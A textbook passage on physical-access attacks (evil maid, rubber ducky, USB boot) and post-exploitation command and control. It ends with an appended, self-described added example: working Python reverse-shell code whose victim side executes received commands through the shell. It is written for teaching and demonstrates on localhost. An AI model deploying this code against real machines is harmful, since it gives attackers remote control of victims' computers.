4. The Need for Cybersecurity: Cyber Attacks 81

objectives. The attacker could also try to exploit a vulnerability to escalate his privileges (more on this below).

In some evil maid attacks, the attacker has only a short time with the device. This would be the case if the target is using a computer in a public place and then gets up and walks away for a few minutes to get a drink, take a phone call, go to the bathroom, etc. A rubber ducky attack uses a special-purpose USB device that presents itself to the computer as a keyboard and “types” a pre-programmed series of keystrokes at machine speed, for example opening a command prompt and executing a series of commands. The attacker plugs in the device, waits a short time depending on the commands being executed (e.g., ten seconds), and then unplugs it and walks away. In that time, the rubber ducky could create a reverse shell from the device back to the attacker, who can then use it to control the machine over the network. This is why it is important for users to activate the lock screen when they step away from their computers.

If an attacker gains physical access to a locked device, he could try a password guessing attack. If he is unable to log in, the attacker can restart the device and boot to an alternative OS stored on a USB stick. This may allow the attacker to read the contents of the hard drive, copy files, and potentially even recover the login credentials of the installed OS. Using full disk encryption would thwart this attack (see Section 9.2.2.1). An evil maid attacker could easily perform a denial-of-service attack on the device by damaging it physically or by formatting or encrypting the hard drive. An attacker could also use his unattended access to install an inconspicuous hardware-based keystroke logger on the device, as explained above. For all these reasons, maintaining the physical security of computing devices is a vital component of cybersecurity.

4.1.3 Post Exploitation

After attackers gain initial access to the target, the post exploitation phase begins.
In this phase, the attacker often establishes command and control (C2) access to the victim machine. C2 lets the attacker remotely issue commands. It usually begins with the victim machine “calling home” by creating a connection out to the attacker’s machine; this is called a reverse shell. At this point, the attacker may be able to quickly accomplish his actions on objectives (see next section) and move on. But in many attacks, the entry point is merely an initial foothold. From there, attackers may attempt to do three things: maintain access, escalate their privileges, and pivot to other computers.
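The reverse shell mentioned in the rubber ducky discussion above and in the C2 description here is simple enough to show in code. The following is an added example, not code from the book: both roles run in one process on the loopback interface, so it is self-contained. The listener is the attacker side; `call_home` is the victim side and is the part a keystroke-injection device would launch. The host, port selection, command set and the `__END__` framing marker are all assumptions for the demo. The point to notice is the direction of the connection: the victim connects out to the attacker, so a firewall that only filters inbound connections does not see anything unusual, which is why monitoring outbound connections from workstations matters.

```python
"""
Added example (not from the book): a minimal reverse shell exchange on
localhost, showing the "call home" pattern the text describes.

  - run_c2_session(): the attacker side. Listens on a port, waits for the
    victim to connect, sends commands, collects the output.
  - call_home(): the victim side. Connects OUT to the attacker, runs each
    command it receives with the local shell, and returns the output.

Everything here is hypothetical: loopback address, OS-chosen port, the
commands issued and the framing marker. Real implants add encryption,
retries and persistence; this shows only the connection direction.
"""
import socket
import subprocess
import threading

ATTACKER_HOST = "127.0.0.1"  # assumption: attacker is reachable on loopback
END_MARKER = b"\n__END__\n"   # assumption: marks the end of one command's output


def call_home(host, port):
    """Victim side: connect outbound, then execute commands until told to exit."""
    with socket.create_connection((host, port)) as conn:
        while True:
            cmd = conn.recv(4096).decode().strip()
            if not cmd or cmd == "exit":
                break
            # Run the command with the local shell and send stdout+stderr back.
            proc = subprocess.run(cmd, shell=True, capture_output=True, timeout=10)
            conn.sendall(proc.stdout + proc.stderr + END_MARKER)


def run_c2_session(commands):
    """Attacker side: listen, accept the call-home connection, issue commands.

    Returns a list with the output of each command so the result is checkable.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((ATTACKER_HOST, 0))  # port 0: let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]

    # In a real attack this is a separate machine; here it is a thread.
    victim = threading.Thread(target=call_home, args=(ATTACKER_HOST, port), daemon=True)
    victim.start()

    outputs = []
    conn, _ = srv.accept()
    with conn:
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            buf = b""
            while not buf.endswith(END_MARKER):
                chunk = conn.recv(4096)
                if not chunk:
                    break
                buf += chunk
            outputs.append(buf.replace(END_MARKER, b"").decode().strip())
        conn.sendall(b"exit\n")
    victim.join(timeout=5)
    srv.close()
    return outputs


if __name__ == "__main__":
    for line in run_c2_session(["echo connected", "whoami"]):
        print(line)
```

Run it as a script and it prints the output of the two commands; the only network traffic is the victim thread's outbound connection to the listener.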